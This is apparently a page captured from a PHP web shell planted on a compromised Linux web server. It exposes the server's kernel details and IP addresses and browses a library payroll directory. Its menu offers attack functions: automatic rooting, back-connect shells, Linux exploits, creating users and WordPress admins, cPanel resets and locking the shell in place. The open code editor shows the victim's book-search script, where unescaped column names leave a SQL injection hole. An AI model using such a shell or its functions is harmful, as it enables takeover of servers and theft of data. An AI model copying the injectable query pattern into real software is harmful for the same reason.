Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.17.159.53
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
payroll /
libs /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets1
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
captcha.php
370
B
-rw-r--r--
change-password.php
4.34
KB
-rw-r--r--
check_availability.php
798
B
-rw-r--r--
dashboard.php
2.42
KB
-rw-r--r--
getBookRecord.php
3.34
KB
-rw-r--r--
index.php
2.85
KB
-rw-r--r--
issued-books.php
5.83
KB
-rw-r--r--
logout.php
376
B
-rw-r--r--
my-profile.php
4.59
KB
-rw-r--r--
opac.php
18.38
KB
-rw-r--r--
signup.php
5.43
KB
-rw-r--r--
studentid.txt
6
B
-rw-r--r--
user-forgot-password.php
4.31
KB
-rw-r--r--
userLogin.php
2.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getBookRecord.php
<?php include("includes/MainClass.php"); $advance_search = $db->real_escape($_POST['advance_search']); if(!empty($advance_search)){ $book_title = $db->real_escape($_POST['book_title']); $subject = $db->real_escape($_POST['subject']); $author = $db->real_escape($_POST['author']); $publication = $db->real_escape($_POST['publication']); $source = $db->real_escape($_POST['source']); $issbn_no = $db->real_escape($_POST['issbn_no']); $issn = $db->real_escape($_POST['issn']); $acc_no = $db->real_escape($_POST['acc_no']); if(!empty($book_title)){ $where .= " AND book_title LIKE '%$book_title%'"; } if(!empty($subject)){ $where .= " AND subject IN (SELECT subject_id FROM subject WHERE subject LIKE '$subject%')"; } if(!empty($author)){ $where .= " AND author LIKE '%$author%'"; } if(!empty($publication)){ $where .= " AND publication LIKE '%$publication%'"; } if(!empty($source)){ $where .= " AND source LIKE '%$source%'"; } if(!empty($issbn_no)){ $where .= " AND issbn_no LIKE '%$issbn_no%'"; } if(!empty($issn)){ $where .= " AND issn LIKE '%$issn%'"; } if(!empty($acc_no)){ $where .= " AND acc_no LIKE '%$acc_no%'"; } }else{ $search_by = $db->real_escape($_POST['search_by']); $search_value = $db->real_escape($_POST['search_value']); if($search_by == "subject"){ $where = " AND subject IN (SELECT subject_id FROM subject WHERE subject LIKE '%$search_value%')"; }else{ $where = " AND $search_by LIKE '%$search_value%'"; } } $record = $db->query("SELECT * FROM book_record WHERE 1 $where ORDER BY acc_no ASC"); $count = $db->num_rows($record); while($result = $db->fetch_array($record)){ $getSubject = $db->fetch_array($db->query("SELECT subject FROM subject WHERE subject_id = '".$result['subject']."'")); $getLanguage = $db->fetch_array($db->query("SELECT language FROM language WHERE language_id = '".$result['language']."'")); $getStatus = $db->fetch_array($db->query("SELECT status FROM status WHERE status_id = '".$result['status']."'")); $table .= '<tr class="odd gradeX"> <td class="center">'.($count--).'</td> <td class="center">'.$result['acc_no'].'</td> <td class="center">'.$result['book_title'].'</td> <td class="center">'.$result['author'].'</td> <td class="center">'.$result['publication'].'</td> <td class="center">'.$getSubject['subject'].'</td> <td class="center">'.$result['almirah_no'].'</td> <td class="center">'.$result['shelf_no'].'</td> <td class="center">'.$getStatus['status'].'</td> <td class="center">'.$getLanguage['language'].'</td> </tr>'; } echo $table; ?>
Close
